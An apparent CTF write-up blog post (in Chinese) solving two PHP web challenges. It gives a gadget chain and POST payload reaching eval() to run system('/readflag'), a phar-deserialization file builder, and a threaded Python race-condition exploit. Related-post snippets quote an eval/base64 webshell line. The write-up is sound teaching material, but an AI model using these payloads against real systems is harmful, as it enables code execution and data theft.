2022DASCTF Apr X FATE 防疫挑战赛

已于 2022-11-08 15:45:32 修改
阅读量308 收藏
点赞数
分类专栏: BUUCTF 文章标签: 2022DASCTF
于 2022-05-05 13:47:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124459724
版权

warmup-php

先分析一下index.php的内容,创建一个对象,并且循环赋值,然后调用run函数。

<?php
spl_autoload_register(function($class){
    require("./class/".$class.".php");
});
highlight_file(__FILE__);
error_reporting(0);
$action = $_GET['action'];
$properties = $_POST['properties'];
class Action{

    public function __construct($action,$properties){

        $object=new $action();
        foreach($properties as $name=>$value)
            $object->$name=$value;
        $object->run();
    }
}

new Action($action,$properties);
?>

我们先找一下利用可以利用的点:

在Base.php的evaluateExpression函数中有个eval可以利用。

在这里插入图片描述

在TestView.php中的renderTableRow函数可以触发Base.php的evaluateExpression函数。
在这里插入图片描述
而TestView.php中的renderTableRow函数又可以通过renderTableBody函数触发。
在这里插入图片描述
那么怎么触发TestView.php中的renderTableBody函数呢?
在index.php中run函数只有ListView.php有,通过run->renderContent->renderSection来连接一个renderTableBody
在这里插入图片描述
最后链子就是这样子

action->run()->renderContent()->renderSection()->renderTableBody()->renderTableRow()->evaluateExpression()

然后在看一下参数rowHtmlOptionsExpressiondata,row以存在。
在这里插入图片描述

最后payload可以构造为

GET:?action=TestView

POST:1=system('/readflag');&properties[template]={TableBody}&properties[data]=phph&properties[rowHtmlOptionsExpression]=eval($_POST[1])

soeasy_php

这边可以任意文件读取
在这里插入图片描述
然后就可以拿到源码了。

在这里插入图片描述
也可以用curl
在这里插入图片描述
upload.php

<?php
if (!isset($_FILES['file'])) {
    die("请上传头像");
}

$file = $_FILES['file'];
$filename = md5("png".$file['name']).".png";
$path = "uploads/".$filename;
if(move_uploaded_file($file['tmp_name'],$path)){
    echo "上传成功: ".$path;
};
?>

edit.php

我们可以看到 flag 类中,把 flagwww-data 权限写到了 /tmp/flag.txt,那么做法就一目了然了,利用 phar 反序列化,那么在哪边触发 phar 反序列化呢?

<?php
ini_set("error_reporting","0");
class flag{
    public function copyflag(){
        exec("/copyflag"); //以root权限复制/flag 到 /tmp/flag.txt,并chown www-data:www-data /tmp/flag.txt
        echo "SFTQL";
    }
    public function __destruct(){
        $this->copyflag();
    }

}

function filewrite($file,$data){
        unlink($file);
        file_put_contents($file, $data);
}


if(isset($_POST['png'])){
    $filename = $_POST['png'];
    if(!preg_match("/:|phar|\/\/|php/im",$filename)){
        $f = fopen($filename,"r");
        $contents = fread($f, filesize($filename));
        if(strpos($contents,"flag{") !== false){
            filewrite($filename,"Don't give me flag!!!");
        }
    }

    if(isset($_POST['flag'])) {
        $flag = (string)$_POST['flag'];
        if ($flag == "Give me flag") {
            filewrite("/tmp/flag.txt", "Don't give me flag");
            sleep(2);
            die("no no no !");
        } else {
            filewrite("/tmp/flag.txt", $flag);  //不给我看我自己写个flag。
        }
        $head = "uploads/head.png";
        unlink($head);
        if (symlink($filename, $head)) {
            echo "成功更换头像";
        } else {
            unlink($filename);
            echo "非正常文件,已被删除";
        };
    }
}
?>

先构造一个 phar 文件。

<?php
class flag{

}
$flag = new flag();

@unlink("shell.phar");
$phar = new Phar("shell.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($flag);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>

我们看一下下面这段代码,当 symlink($filename, $head) 判断为 false 的时候(可以添加一点脏数据绕过),会利用 unlink 删除文件,这边 unlink 可以触发 phar 反序列化,但是 flag 类,它是把 flag 写入了临时目录里,当 post 表单结束是时会自动删除,所以我们要条件竞争,在它删除前替换头像读取它。

        $head = "uploads/head.png";
        unlink($head);
        if (symlink($filename, $head)) {
            echo "成功更换头像";
        } else {
            unlink($filename);
            echo "非正常文件,已被删除";
        };

exp:

import requests
import threading
import time

url = "http://d2151e13-985d-4e41-858d-777188ae6b1d.node4.buuoj.cn:81/"
png = "/uploads/head.png"
flag = "../../../../../../tmp/flag.txt"
phar = """phar://../../../../../../var/www/html/uploads/847d0f7423cc68ed6b91da337e722203.png/test.txtaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"""

#读取flag
def getpng():
    res = requests.get(url+png)
    print(res.text)

#把头像链接转为 flag 链接
def linkflag():
    data = {
        "flag":"1",
        "png":flag
    }
    res = requests.post(url=url+"/edit.php",data=data)
    print(res.text)

#触发phar,把flag 写入 /tmp/flag.txt
def putphar():
    data = {
        "flag":"1",
        "png":phar
    }
    res = requests.post(url=url+"/edit.php",data=data)
    print(res.text)

while True:
    for i in range(10):
        t3 = threading.Thread(target=putphar)
        t3.start()
        t2 = threading.Thread(target=linkflag)
        t2.start()
        t1 = threading.Thread(target=getpng)
        t1.start()
    time.sleep(5)

参考:

wp

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022DASCTF Apr X FATE 防疫挑战赛WP
LaniakeaHarry的博客
04-24 3427
NEFU-NSILIB下Maple战队分队于4月23日10:00 - 18:00所产WriteUp.
2022DASCTF Apr X FATE 防疫挑战赛 WriteUP
Huamang的博客
04-25 2217
文章目录MiscSimpleFlowWebwarmup-phpsoeasy_php Misc SimpleFlow 看流量大概是上传了一个后门,但是会对payload加密,这里发现有flag.txt被打包 后面的包里面发现flag.zip 但是打开需要密码,那么我们就要回去压缩的地方,看看给的什么密码,所以我们就得解开这个流量 @eval(@base64_decode($_POST['m8f8d9db647ecd'])); &e57fb9c067c677=o3 &g479cf6f058c
[2022DASCTF Apr X FATE 防疫挑战赛] warmup-php
Sentiment的博客
06-08 762
先看下spl_autoload_register函数用法1.php Test.php 其实就相当于一个文件包含的作用,当实例化对象时,会将我们实例化的内容传入KaTeX parse error: Expected group after '_' at position 42: …实例化Action时,会调用`_̲_construct()`,该…action,如果我们传参action的值为,那么在$object=new Test()后,就相当于包含了,从而也就可以调用类中的A方法了若去掉spl_autoloa
Java Spring架构的php实现,协同架构 (来自老外文章)
super_ufo的笔记
09-04 3500
Java Web 应用程序和 Spring 的 DispatcherServlet 结构为应用程序的 PHP 部分提供了一个极好的模型。与将这样出色的面向对象抽象抛出窗口所不同的是,您将快速地获得有助于模拟 Spring 的属性注入和 MVC 分派功能的一组类。您将编写一个负责读取多个属性文件的 Properties 类,一个使您从那些文件中向类实例注入属性的 Injectable 类,以及一个
2022DASCTF Apr X FATE 防疫挑战赛 Writeup
末初的CSDN博客
04-25 2532
文章目录SimpleFlow熟悉的猫冰墩墩 废物选手的misc做题记录 SimpleFlow 首先tcp.stream eq 50中分析传入的执行命令的变量是$s,也就是参数substr($_POST["g479cf6f058cf8"],2) 找到对应的参数,然后去掉前面两位字符解码即可 cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E] 得到压缩包密码:PaSsZi
[MISC]2022DASCTF Apr X FATE 防疫挑战赛
RookieMOR的博客
05-06 918
1.SimpleFlow; 2.熟悉的猫; 3.冰墩墩; 1.SimpleFlow: 下载得到SimpleFlow的压缩包,解压得到SimpleFlow.pcapng,流量分析题目。查找 flag. ,可以知道一共有四个flag.txt文件,一个flag.zip文件。用kali的foremost指令可以分离出flag.zip文件,发现flag.zip需要密码。 再追踪每个flag.txt。 发现蚁剑流量,一个一个base64解码, 在其中一个txt文件中得到: Y2QgIi9Vc2Vy.
easy_real复现
qq_61774705的博客
04-30 256
题目源码: import random import hashlib flag = 'xxxxxxxxxxxxxxxxxxxx' key = random.randint(1,10) for i in range(len(flag)): crypto += chr(ord(flag[i])^key) m = crypto的ascii十六进制 e = random.randint(1,100) print(hashlib.md5(e)) p = 64310413306776406422334034...
APR2007_d3dx10_33_x64
10-11
APR2007_d3dx10_33_x64
Apr2006_d3dx9_30_x64
10-11
Apr2006_d3dx9_30_x64
APR2007_d3dx9_33_x64
10-11
APR2007_d3dx9_33_x64
vs2013下编译的64位apr
04-23
压缩包中的“apr-vs2013-x64”很可能是指整个编译环境和编译结果的打包文件,可能包含编译脚本、配置文件、编译好的库文件以及头文件等。 总的来说,这个压缩包为在Windows 64位环境下使用Visual Studio 2013开发...
Nacos 2.1.0 (Apr 29, 2022)
07-21
2.1.0版本的发布日期为2022年4月29日,它带来了许多新特性、优化和修复了已知问题,以提升整体性能和稳定性。 1. **服务发现**: - Nacos作为服务注册与发现的核心组件,允许微服务实例向中心节点注册自身信息,...
[2022DASCTF Apr X FATE 防疫挑战赛]web题目复现
cosmoslin的博客
05-02 970
warmup-php 给了源码: <?php spl_autoload_register(function($class){ require("./class/".$class.".php"); }); highlight_file(__FILE__); error_reporting(0); $action = $_GET['action']; $properties = $_POST['properties']; class Action{ public function __
2022DASCTF Apr X FATE 防疫挑战赛 warmup-php
weixin_43610673的博客
04-24 2405
主页代码逻辑就是自动加载class下类文件,然后动态调用一个类,并设置成员变量。最后调用类的run()方法。 看uml类图其实就大致有数该实例化哪个类了,TestView 看这几个类文件的内容,很明显的页面模板生成代码,感觉是根据YII2框架的模板渲染提取的主要逻辑 先找漏洞点,在Base类中 再去找调用链,搜索run()方法,在ListView类中 接着跟到renderContent,会去调用类中的renderSection方法,$this->template需为{test}形式,才会被正则
营销策划 -2024非遗大展预热引流策划方案.pptx
07-13
营销策划 -2024非遗大展预热引流策划方案.pptx
全网最热Python3入门+进阶 更快上手实际开发
07-13
网最热Python3入门+进阶 更快上手实际开发 第1章 Python入门导学.mp4 239.6MB 第9章 高级部分:面向对象 第8章 Python函数 第7章 包、模块、函数与变量作用域 第6章 分支、循环、条件与枚举 第5章 变量与运算符 第4章 Python中表示“组”的概念与定义 第3章 理解什么是写代码与Python的基本类型 第2章 Python环境安装 第1章 Python入门导学 第14章 Pythonic与Python杂记 第13章 实战:原生爬虫 第12章 函数式编程: 匿名函数、高阶函数、装饰器
物资合同管理台账.docx
07-13
物资合同管理台账.docx
项目管理策划编写模板.docx
07-13
项目管理策划编写模板.docx
营销策划 -现代牧业发布会全案策划.pptx
最新发布
07-13
营销策划 -现代牧业发布会全案策划.pptx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值